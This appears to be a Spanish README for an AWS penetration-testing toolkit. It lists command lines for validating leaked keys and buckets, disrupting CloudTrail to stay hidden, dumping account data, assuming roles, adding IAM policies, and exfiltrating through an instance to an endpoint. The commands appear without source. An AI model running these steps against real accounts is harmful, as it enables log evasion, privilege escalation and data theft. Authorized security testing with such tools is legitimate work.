
Una colección de material para pruebas de penetración en AWS
Esta es una colección de guiones horriblemente escritos para realizar varias tareas relacionadas con pruebas de penetración en AWS. No te entristezcas si no funciona para ti. Puede que AWS haya cambiado desde que se escribió una herramienta en particular o que el código sea una porquería. De cualquier manera, siéntete libre de contribuir.
La mayor parte de esta basura fue escrita por Daniel Grzelak, pero ha habido muchas contribuciones, sobre todo de Mike Fuller.
pip install -r requirements.txt
Asegúrate también de configurar tus credenciales de AWS en ~/.aws/credentials.
Cosas que hacer con la recopilación de información previa al compromiso.
./validate_iam_access_keys.py -i /tmp/keys.txt -o /tmp/out.json
./validate_s3_buckets.py -i /tmp/words.txt -o /tmp/out.json
./validate_iam_principals.py -a 123456789012 -i /tmp/words.txt -o /tmp/out.json
./validate_accounts.py -i /tmp/accounts.txt -o /tmp/out.json
Cosas que te ayudarán a ganar un punto de apoyo en una cuenta.
Cosas que pueden ayudarte a permanecer oculto después de comprometer una cuenta.
./disrupt_cloudtrail.py -s
Cosas para ayudarte a entender lo que has comprometido.
./dump_account_data.sh /tmp/
Cosas para ayudarte a moverte dentro de una cuenta y reunir diferentes niveles de acceso.
./dump_instance_attributes.py -u -o /tmp/
./dump_cloudformation_stack_descriptions.py -o /tmp/data
./assume_roles.py -o /tmp/out.json
./add_iam_policy.py -u myuser -r myrole -g mygroup
./bouncy_bouncy_cloudy_cloud.py -i instance-id -e exfiltration-endpoint
Cosas para ayudarte a mantener tu acceso a una cuenta.
Cosas para ayudarte a extraer y mover datos de formas propias de AWS.
Otras cosas que fui demasiado estúpido o demasiado vago para clasificar.